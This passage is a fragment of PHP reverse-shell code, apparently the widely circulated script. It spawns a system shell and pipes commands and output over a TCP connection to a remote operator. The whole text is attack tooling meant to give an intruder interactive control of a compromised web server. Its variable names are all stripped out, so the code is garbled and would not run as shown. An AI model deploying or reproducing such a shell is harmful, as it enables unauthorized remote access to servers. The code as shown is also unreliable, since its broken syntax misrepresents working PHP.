array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); = proc_open(, , ); if (!is_resource()) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking(, 0); stream_set_blocking(, 0); stream_set_blocking(, 0); stream_set_blocking(, 0); printit("Successfully opened reverse shell to :"); while (1) { // Check for end of TCP connection if (feof()) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof()) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down , or some // command output is available on STDOUT or STDERR = array(, , ); = stream_select(, , , null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array(, )) { if () printit("SOCK READ"); = fread(, ); if () printit("SOCK: "); fwrite(, ); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array(, )) { if () printit("STDOUT READ"); = fread(, ); if () printit("STDOUT: "); fwrite(, ); } // If we can read from the process's STDERR // send data down tcp connection if (in_array(, )) { if () printit("STDERR READ"); = fread(, ); if () printit("STDERR: "); fwrite(, ); } } fclose(); fclose(); fclose(); fclose(); proc_close(); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit () { if (!) { print "\n"; } } ?>